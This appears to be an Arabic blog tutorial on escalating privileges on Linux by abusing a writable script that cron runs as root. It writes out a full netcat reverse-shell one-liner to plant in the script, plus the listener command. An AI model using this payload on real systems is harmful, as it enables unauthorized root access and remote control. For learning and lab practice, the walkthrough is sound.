Privilege Esclation (Cron Jobs)

رفع صلاحيتك على النظام

Jehad Alqurashiمنذ 3 سنوات

 

السلام عليكم ورحمة الله وبركاته


الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:


مقدمة:

في هذي المقالة راح اشرح لكم تكنيك من تكنيكات رفع الصلاحية على نظام اللينكس وفي هذا التكنيك راح نعتمد على Cron Jobs ف إذا ماعندك خلفية عنها او كيفية طريقة عملها تقدرتتابع هذي المقالة 

شرح Cron Jobs

الشرح:

ف البداية انا داخل بيوز محدود الصلاحية على النظام واسم اليوز test طبعا الهدف اللي ودنا نوصله انه نقدر ننفذ اوامر بيوزر root اللي هو اعلى صلاحية على النظام بالنسبة للينكس


 

طبعا بما انه التكنيك هذا يعتمد على Cron Jobs راح نقرا الملف الخاص بالجدولة حقته عن طريق هذا الامر

cat /etc/crontab

 

نلاحظ عندنا في احد التاسكات او المهام اللي تتنفذ كل دقيقة انه يقوم بتشغيل ملف بلغة perl كل دقيقة بصلاحية root جميل ..

خلونا نروح لمسار الملف عشان نشوف هل عندنا صلاحية للتعديل على الملف او لا:

tmp/

نلاحظ انه عندنا صلاحية الكتابة و القراءة على الملف ف لو ننفذ امر على النظام عن طريق دالة system هذا الامر راح يرجع لنا اتصال عكسي وترجع لنا جلسة بصلاحية root 

راح نكتب هذا الكود داخل الملف :

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f")

طبعا انت راح تعدل في الامر قبل لا تكتبه في الملف 

 راح تحط محل كلمة IP الايبي الخاص بجهازك اللي راح تنفتح عليه الجلسة وكذلك راح تغير كلمة PORT وتحط اي بورت من عندك

وقبل لا تسوي حفظ للملف راح تسوي تنصت عن طريق اداة النت كات على البورت اللي وضعته في الامر 

وهذ الامر الخاص بالتنصت :
nc -lvp PORT

 

راح ننتظر بضع دقائق حتى توصلنا الجلسة :)

 

 

وبكذا حصلنا على اعلى صلاحية في النظام root

المصادر:

https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/

 

كلمات دليلية: hacking linux privilege
2
إعجاب
1071
مشاهدات
0
مشاركة
1
متابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !